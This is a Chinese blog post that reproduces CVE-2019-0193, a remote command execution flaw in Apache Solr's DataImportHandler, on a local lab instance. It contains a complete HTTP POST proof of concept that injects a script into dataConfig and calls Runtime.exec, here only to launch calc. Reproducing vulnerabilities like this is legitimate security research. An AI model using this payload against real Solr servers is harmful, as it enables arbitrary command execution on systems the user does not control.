zoukankan      html  css  js  c++  java
  • CVE-2019-0193:Apache Solr 远程命令执行漏洞复现

    0x00 漏洞背景

    2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重

    0x01 影响范围

    Apache Solr < 8.2.0

    0x02 环境搭建

    下载地址https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip
    在本地解压,进入solr-7.7.2目录,执行命令 bin/solr -e dih (前提:java环境)

    然后访问http://localhost:8983/solr即可访问环境

    0x03 漏洞利用

    首先我们可以通过接口 curl http://127.0.0.1:8983/solr/admin/cores 来获取所有 core 信息,下面我们构造 payload 需要 name 信息

    在Burp中发送以下POC即可执行命令弹出计算器,下面的 <your_core_name> 需要替换为你获取到的 core 的 name(共两处)

    POST /solr/<your_core_name>/dataimport HTTP/1.1
    Host: 127.0.0.1:8983
    Content-Length: 763
    User-Agent: Mozilla/5.0
    Content-type: application/x-www-form-urlencoded
    Connection: close
    
    command=full-import&verbose=false&clean=false&commit=true&debug=true&core=<your_core_name>&name=dataimport&dataConfig=
    <dataConfig>
    <dataSource type="URLDataSource"/>
    <script><![CDATA[
    function poc(row){
    var process= java.lang.Runtime.getRuntime();
    process.exec("calc");
    return row;
    }
    ]]></script>
    <document>
    <entity name="stackoverflow"
    url="https://stackoverflow.com/feeds/tag/solr"
    processor="XPathEntityProcessor"
    forEach="/feed"
    transformer="script:poc" />
    </document>
    </dataConfig>
    

    执行效果如下:

  • 相关阅读:
    Jqurey 得到url参数 getUrlParam
    JQUERY获取当前页面的URL信息
    TextView,imageView属性讲解
    滑动解锁
    显示界面跳转,隐式跳转
    代码进行Relativelayout,constraintLayout布局
    代码布局-LinearLayout
    实例xml拖拽详细方法布局
    layout布局
    AS资源了解
  • 原文地址:https://www.cnblogs.com/nul1/p/12466439.html
Copyright © 2011-2022 走看看